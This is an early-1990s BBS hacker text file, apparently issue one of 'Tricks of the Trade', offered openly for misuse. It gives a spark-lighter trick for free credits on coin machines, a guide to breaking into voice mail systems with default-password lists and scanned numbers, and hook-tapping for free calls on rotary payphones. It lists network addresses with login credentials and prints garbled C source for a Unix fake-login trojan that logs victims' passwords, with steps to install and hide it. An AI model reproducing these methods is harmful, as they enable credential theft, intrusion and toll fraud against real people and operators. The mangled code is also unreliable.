
-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-

        __________   .____  ________  _____.____  __________________
        \_ ______/___|_   \_\_ ____/_ \_   |    \_\_  ___________   \_
       _/   ___/_/   |/    /    |/   \_   ___  __/   ____)__   |/    /
       \     |  \    |    /     |     /    |/   \_    |/   |   |    /
        \____|   \_______/ \_________/l____|     /____.    |_______/
                                           l____/     `----'
                                             _____
              ___   ________        _________\_ __l___  _________
             (___) _\_____  \_      \____ __________  \_\_  ____/
             |    \_    |/    \        |   | |    |/    \  ____)__
             |     /    |     /        |   | |    |     /   |/   |
             l____/l____|____/         l___| l____|____/____.    |
                  _____       adk!                          `----'
                  \_ __l___  ___________________   ________
  'ø3ø pOWER!     |  \___  \_\_  ____________ _/ __\____   \_ sYSOP:
                  |    |/    \  ____)__   ___   \_    |/    /   bAD lANGUAGE
 34ø mEGZ oNLiNE  |    |     /   |/   |    |/    /    |    /
 1.7 giG oFFLiNE  l____|____/____.    |_________/l________/     28k8 sUPRA
                                 `----'                         14k4+ oNLY!

 -[ ø-dAY aMiGA wAREZ! ]-[ HP^ · iMAGiNE · LsD DøCS · CøNF's ]-[ K-RaD cPS!]-  

                                 +64-42-eLiTE
                   ..aND dON'T fORGET, yOU'LL nEED tHE nUP!


-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-

@BEGIN_FILE_ID.DIZtRiCKS oF tHE tRADE - issue 01
@END_FILE_ID.DIZ
---------------------------------------------------------------------------
                                T. O. T.  
===========================TRICK'Z of the TRADE============================
                       
                               EDiTiON ONE!
 
 
                             - iNTRODUCTiON -
 
 
  This file is for informational purposes only. So if you get snapped by
  any Authorities, dont fuckin say a guy name @@@@ gave me this info.. 
  DONT SAY THAT CAUSE ITS YOUR RISK AND YOUR RESPONSIBILITY TO SAVE YOUR 
  OWN ASS !!!!
  
  
  CONTENT'Z:::... 
  
  a.. CLiCKERS..............................Hype/RTC
  b.. V. M. S...............................Hype/RTC
  c.. TROJANS...............................Hype/RTC
  d.. PHREAKiNG.............................Grey rat/acme
  e.. FONE'Z................................joker/?? (next issue)
  f.. HACKiNG...............................Hype/RTC (next issue)
  g.. WAYS OF FiNDiNG OUT A CALLiNG CARD Nø.Hype/RTC (next issue)
  h.. HiNTZ N TiPZ..........................Hype/RTC (next issue)
  i.. THiNGS 2 PISS PEOPLE OFF !!!!.........Grey rat/acme ( " " )
  j.. HOW TO FUCK UP A BBS..................Grey rat 'n' Hype ( ")
  k.. HOW TO HACK CiTYNET/GENIE.............Hype/RTC (next issue)
    
    
                                                                       
                                  - A - 
                                CLiCKERS!
                               
                                by HYPE!
  WHAT IS A CLiCKER ? 
  
  A Clicker is a ignition device found on gas-heaters, barbeques etc.. 
  it looks like this..      
                          
                           ###  <-- red button                        
   7 - 9 cm long.          ### 
                        ---------     SiDE ViEW STANDiNG UP 
                         *******                        
                          I***I
                          I***I  <-- plastic cover(sometimes metal)
                          I***I
                           ***
                           ***
                            +   <-- ignition point

  WHAT iS iT USED FOR ?
  
  Clickers are used for getting free credits on arcade machines, coke 
  machines, rotory coin phones.. 
  What you do is point the clicker on the coin slot and push several 
  times on the button. What happens is that the clicker gives a high 
  amount of voltage on the machine that would trigger the switch that
  the coins hit. 
  
  Try to expriment with other machines with the clicker. 
  
                             
                                                                
                                  - B -
                                 V. M. S.
                       
                                 by HYPE!                         
  WHAT YOU NEED ..
  
  All you need is a digital phone..I mean a PUSH BUTTON PHONE.
  

  I> BASiC RULES (and some things you must know.)                             
 
  FiRST YOU HAVE TO KNOW SOME BASiC THiNGS !!
  
  1.be careful, be fuckin careful, since they invented the 5ESS (eletronic
  switching system 5) its very easy to trace you.
  2.only try a list of simple psswords, (part V.) if these dont work 
  forget it ! its too risky to try more codes. So you can put a code
  hacker on your phoneline.
  3.the biggest (i think) is to find out the pssword length. A pssword can
  have 4 - 8 digits and the box will never let you know how many digits
  are needed, but psswords of 3,4 and 6 digits will frequently used.
  4.if youve found the operators box (yes they have a box too)and you 
  can hack the pssword, DONT CHANGE IT !! Just use it sneakily cause 
  this box is checked every day !! But if you hold it, you can read the 
  mail all over the system, make new boxes, delete boxes. Youll be
  feeling like GOD of the voice mail system. They always have a simple
  extension like: 999, 123, 911 or # like that, its used for questions
  and reporting on boxes if someones box is stolen.
  5.have fun but be careful. and never leave important phone numbers or
  adresses on the system. the operator can read all mail.
  6.always follow the basic steps of VMB hacking !
   

  STEP 1.. 
  Find a Voice Mail System. In your case you cant use the numbers in part
  IV. 
  
  STEP 2..
  Find an empty box.
  
  STEP 3..
  Obtain your own box. Now guess the psword of the box, only use the 
  standard psword table in part V. If they dont work then try 1234.(it
  normally works for me.)
  
  STEP 4..
  Check out the box, get to know whats possible !
  
  
  II> WHY PHREAK VOiCE MAiL SYSTEMS ?          
  
  Many hackers/phreakers are saying: vmbs, haahaa, what a waste of time.
  Maybe this was true a few yrs back but now theres many many vmbs all 
  over the world !!. and the techniques are developing fuckin fast.

  There are systems which can send faxes from a box to a fax. But first
  you have to ul. a fax. If you can do this with a fax, why not with 
  pure data ? Think big !
  
  There are also outdialing options to use your vmb like its a PBX.
  [PBX = private branch Xchange]
  
  III> CENTAGRAM..
  
  These are direct dial (you dont have to enter a box number). 
  To get on one of these, first have a no: to any box on the system.
  All of the other boxes will be on the same prefix; just start scan-
  ning them until you find one that has a message saying that person
  you are calling is not availble. This usually means that the box
  has not been assigned to anybody yet. Before the nice ladys voice 
  tells you to leave the message, hit #. You will then be prompted 
  for your pssword. The pssword will usually be the same as the last
  four digits of the box's number or a simple no: like 1000, 2000
  , etc.. Once you get on, they are very user friendly and will 
  prompt you with a menu of options. If you cant find any empty boxes
  or want to do more, you can hack but the system administrators box,
  will allow you to hear anybody's msg's and create and delete boxes.

  SPERRY LINK..
  
  These systems are very nice. They will usually be found on an 800 no:
  These are one of the hardest to get a box on cause you must hack out
  a user-ID (diff. from the person's box no:) and a pssword. When it
  answers, if it says,"This is Sperry Link voice station. Please enter
  your user ID," you will have to start trying to find a valid user ID.
  On most Sperrys it will be a five digit no: If it answers and says,
  "This is an X answering service," you first have to hit *# to get
  the user no: prompt. Once you get this, get yourself a box. When it
  answers you can hit * for a directory of the boxes on it (it will only
  hold 23). If you hit # you will be given a menu of options and when
  you choose an option you will then be prompted for your ID number.
  The ID number on an RSVP system will just about always be the same as
  the mailbox number, which are always only 2 digits.
  
  A. S. P. E. N.  (automatic speech exchange network.)
   
  The aspen voice msg systems made by Octel telecommunications is in my
  opinion the BEST VMS made. To get a box on an Aspen, you need to find
  an empty box. To find an empty box, scan the box numbers and if one 
  says,"You entered XXXX. Please leave a msg at the tone," then this is
  an empty box. You next just press # and when prompted for your box 
  number enter the number of the empty box and friendly voice of the 
  nice lady will guide you through all of the steps of setting up your 
  box. She first tells you what you can do with the box and then will
  prompt you with,"Please enter the temporary pssword assigned to you 
  by your system manager." This pssword will usually be 4 digits long
  and the same as the box number like 1000, etc. Once you get on, their 
  are many things you can do. You can make a distribution list where
  if you want to leave a certain msg to more than one person, you can
  enter the list number and all of the boxes on the list will get the
  msg. You can also have the system call you and notify you that you
  have new msgs. These systems also have what they call "Information
  Center Mailboxes" that are listen only and can also have a pssword on
  them so the person calling has to enter the pssword before he hears 
  the greeting msg. Aspen VMSs have a system managers mailbox that will
  just about give you total control of the whole system and let you lis-
  ten to peoples mail, create and delete boxes, and many other things.
  
  IV> SOME RECENTLY NUMBERS..
   
  1911 General Electric (enter 1+ext, enter 11)
  1291 USA Rollerblades consumer hotline (not during office hrs.)
  1471 Some VMB for farmers (? digit extension, <200 or <2000)
  1527 Explore International VMB (sometimes an ordinardy answering mac)
  1595 Audio Information Exchange (enter 3,2 digit box)
  1760 Voice Msg Exchange (enter your ID#, 6 digits)      
  1913 US Calalry (placing orders,receive catalog, quotation, costumer serv
       Extension 1 digit, 3 digits)
  0030 Strange VMB *7 and *8 seem to be commands.
  5870 Meridian Mail (3 digits, 3 digits pssword)
  1529 Audit (3 digits, 3 digits pssword)
  0462 COCA COLA Driftplan line 
  0155 SRS ???
  9975 Peter Dickenson
  0136 Cant remember, but its a VMB !
  0533 Feild Work (a really simple VMB but im not trying so much.)
   
  
  NEW #S SiNCE 10 JULY '93.. (i havent tryed them all.)
  
  2262 Extension 2222 gives a dialtone
  2290 Enter 4 digit extension
  2354 ?
  2370 At the time i scanned this one you could get a connection with 
       911 
  2372 Enter 4 digit extension
  2454 Moto accent
  2597 Voicecom
  2730 Boston uni.
  2740 ?
  2750 ?
  2760 ? 
  2796 Vmb, fast voice.
  2851 Enter 5 digit code
  2903 ?
  2035 Vmb- bert johnson (direct dial)
  2177 Enter 0 to enter system ???
  3214 ?
  3365 Voicecom (6 digit ID# code)
  3460 7 digit ID#
  3474 Audit services
  3497 ?
  3530 ?
  3545 Voicecom
  3549 ?
  3684 A. S. P. E. N. !!
  3703 Global pbx (need access code)
  3718 Entertainment
  3719 Phonemail cincanetti
  3749 After beep press 0* and pssword
  3756 ?
  5315 0* after the beep
  3881 0* after the beep
  3738 VMB
  4011 Voicetask msging service
  4108 Beridy/Beredy ??
  4397 ?
  4518 Need to login
  4780 ?
  5172 Press 9+ extension to get into the vmb of a person..(v.interesting)
  5177 Like 5172
  5210 ?
  5303 ?
  5376 Meridian mail
  5689 ? 
  5704 ?
  5741 ?
  5742 ?
  5748 ?
  5785 Try to experient this one !!
  
  V> PSSWORDS TO TRY..
  
  Try between 5000 - 7000 or 1234, 2222, 4444, 1111, 0000 etc..
  Usually the pssword is the last four numbers of the VMS number  .eg. 
  0800 800 147 the pssword will be 0147, if it dosent work try different
  numbers until you get the right numbers. Do not try too many numbers
  or the operator gets suspesious about it !!
  
  VI> CODES TO TRY..
  
  1.People usually take an easy number. The sysop usually installs a
    box with the same code as the box #.
  
  2.Codes like: 111, 222, 333, 444, 555, 666, 777, 888, 999, 000, 123, 
                321. 1111, 2222, 3333 .... get the idea. If these codes
                dont work then forget it !!
               
  3.Boxes that say: Box number ####, your call is being transfer. If 
    somebody gets a box, the first he will do is speak his greeting,
    CHECK IT OUT !!!
 
  4.The call transfer option.
    (you must freak a box first)
    Try to program this number, maybe you can use it like a sort of PBX.

  VII> BOX OPTiONS..

  71 Reply msg                         81 Login to your mailbox !!!
  72 Play envelope                     82 Greetings man
  73 Call forward (!?!)                83 Disconnect 
  74 Reply all msgs                    84 Change pssword !!
  75 Composer (nice)                   85 Distribution
  76 Delete msg                        86 Goto
  79 Send msg
  
  70 Msg options :-1 Urgent delivery.
   2.Standard delivery
   4.Private delivery
   5.Acknowl. delivery
   6.Time delivery
   #.EXIT.
                                   


                                   - C -
                                  TROJANS                    
                          
                                 by HYPE!                               
  UNIX TROJAN HORSE..
  
  This program simulates the login for a unix machine. However, the login
  and pssword are written to a file in your directory. The user geat a 
  "login incorrect" msg and thinks they have mis-typed their pssword. They
  are given a second chance, but the new 'login:' prompt is the real one
  they then get access to their account and are none the wiser.
 
  You must be running a fairly robust version of UNIX. 4.2 or 4.3bsd, or
  AT&T system V are fine. I wrote this one for pyramid 90x32 bit system
  running the above flavors of UNIX. It works fine for me and it should 
  work on your system fine with no modification.

  To run the program, enter the source given below in a file called..
  'horse.c' and configure it as necessary (see below). Then, from the
  shell promp, type:

  CC HORSE.C -LCURSES -LTERMCAP   (to compile the program)

  then type:
  
  MV A.OUT HORSE   (to rename the object code.)
 
  Voila, you now have a program which can be tested by typing 'horse'.
  However, in order for the program to work properly, it must be called
  from a shellscript. Create a file called script and enter these two 
  lines:
 
  HORSE   (invokes your program)
  LOGIN 

  Now, type:

  SOURCE SCRIPT   (run the shell script)

  to execute the above file. The horse program will be run. It will sim-
  ulate the login process. After completing its task it will invoke the
  REAL login process.

  If you wish, you can tack the above two lines to your ".logout" file
  (the shellscript which is executed when you log out) so the program 
  will be automatically executed each time you log out normally.

  -----Source Begins Here-----

  #INCLUDE <CURSES.H>
  #INCLUDE <SIGNAL.H>
  INT STOP();
  MAIN()
  [
  CHAR NAME[10], PASSWORD[10];
  INT I;
  FILE *FP, *FPOPEN();
  SIGNAL(SIGINT,STOP);
  INITSCR();
  PRINTF("\N\NTIBURON SYSTEMS
  4.2/SYS V UNIX (TIBURON)\N\N\N\NLOGIN:");

  /*The above line is very impotant - it prints the header that your 
  machine prints when it greets the world. Change this line so it says
  what your machine would say. Each \n is a carriage return*/

  SCANF("%[^\N]",NAME)
  GETCHAR();
  NOECHO();
  PRINTF("PASSWORD:");
  SCANF("%[^\N]',PASSWORD),
  PRINTF("\N");
  GETCHAR();
  ECHO();
  SLEEP(5);

  /*sleep(x) is the delay between prompting for a password and printing
  "Login incorrect." Change it so it looks like your login routine's
  speed*/

  IF ( ( FP = FOPEN("STUFF","A") ) ! = -L ) [
  FPRINTF(FP,"LOGIN %S HAS PASSWORD %S\N",NAME,PASSWORD);
  FCLOSE(FP);  ]
  
  PRINTF("LOGIN INCORRECT\N");
  ENDWIN();  ]

  STOP() [   /*THE ^C TRAP.*/
  EXIT(0);  ]
 
  -----Source Ends Here-----
 
  OK. After you have run the program successfully and people have fallen
  for it, a file called "stuff" will have a table of all login name/pss-
  word combinations snagged. (This file can be incriminating so delete
  it whenever necessary.)
 
  This program traps ^C's entered by suspicious users. However, it cant
  catch a ^Z (STOP signal) so it is vulnerable to them. If somebody stops
  your program, they will be in your account and your little game will 
  be up. Also, take care that you are using a terminal that times out
  after a few minutes while waiting for somebody to come up to the term-
  inal youre running it on.
                  


                                   - D -
                                 FREAKiNG!
                          
                                by RED LION!
 
  This is a really old phreaking trick and it still works !!!
  
  All you have to do is find a ROTORY PHONE. They are old phones the
  ones where you have to put coins in. They are hard to find these days
  cause they exchanged rotory's with Card phones !!
  
  WHAT TO DO..
 
  Once you find the rotory phone, just pick up the phone and follow these
  instructions..
  
  Now the trick is that you TAP the receiver. 
  like say you were ringing a number like ..  477-3240  then do 10 take
  away the first no: and it equals 6 so you tap the receiver 6 times !
  then pause for a couple of seconds and tap the next one 3 then pause
  and tap 3 times agin pause and tap 7 times pause tap 8 times pause tap
  6 times pause tap 10 times !! then wait and you will hear the line
  ringing without you paying..
 
  if no: is 1 then 9 taps
  if no: is 2 then 8 taps
  if no: is 3 then 7 taps
  if no: is 4 then 6 taps
  if no: is 5 then 5 taps
  if no: is 6 then 4 taps                   
  if no: is 7 then 3 taps                          
  if no: is 8 then 2 taps
  if no: is 9 then 1 tap       
  if no: is 0 then 10 taps

  TELENET.. 
 
  it seems that not many of you know what TELENET is connected to about 
  eighty computer-networks in the world. No, i dont mean eighty nodes, but
  eighty networks with thousands of un-protected computers. When you call
  your local Telenet-gateway, you can only call those computers which 
  accept reverse-charging-calls. If you want to call computers in foriegn
  countries or computers in USA which do not accept R-calls, you need a
  Telenet-ID. Did you ever notice that you can type ID xxxx when being 
  connected to Telenet? you are then asked for the password. If you have
  such a NUI(network-user-ID) you can call nearly every host connected to
  any computer-network in the world. Here are some examples...
 
  026245400090184: IS A VAX IN GERMANY (USERNAME..DATEXP AND LEAVE MAIL FOR
                   CHRIS!!!)
  0530197000016  : IS A BBS IN NEW ZEALAND
  024050256      : IS THE S-E-BANK IN SWEDEN (LOGIN AS..GAMES)
  0242211000001  : UNI OF OSLO IN NORWAY (TYPE  LOGIN 17,17  TO PLAY THE 
                   MULTI-USER-DUNGEON)
  0425130000215  : SOMETHING LIKE ITT DIALCOM, BUT THIS ONE IS IN ISRAEL 
                   ID..HELP  PW..HELP  WORKS FINE WITH SECURITY LEVEL.3 
                     
  PREFIXES..

  02624 is DATEX-P in GERMANY
  O2342 is PSS in ENGLAND          
  03110 is TELENET in USA
  03106 is TYMNET in USA
  02405 is TELEPAK in SWEDEN
  04251 is ISRANET in ISRAEL
  02080 is TRANSPAC in FRANCE
  02284 is TELEPAC in SWITZERLAND
  02724 is EIRPAC in IRELAND
  02704 is LUXPAC in LUXEMBOURG
  05252 is TELEPAC in SINGAPORE
  04408 is VENUS-P in JAPAN
  05512 is TELEPAC in NEW ZEALAND
  
  ...AND SO ON...
 
  As you see most of the password's are very simple, this is because they
  must not have any fear of hackers. Only a few german and new zealand 
  hackers use these networks. Most of the computers are absoulutely easy                                       
  to  hack!! 
  
  RED LION .. 
  
  ps: CALL 026245621040000 AND TYPE  ID INF300 WITH PW  DATACOM
                               

  Thatz it for ISSUE #1.. look out for issue two! 
  Release date of ISSUE 2 should be around aug-sep this year! 
   
  (L8R)
   
   
   
   
   
   
   
   
  end.
  
  
  
  











































































































                                                          [-AquaAdder v1.0-]
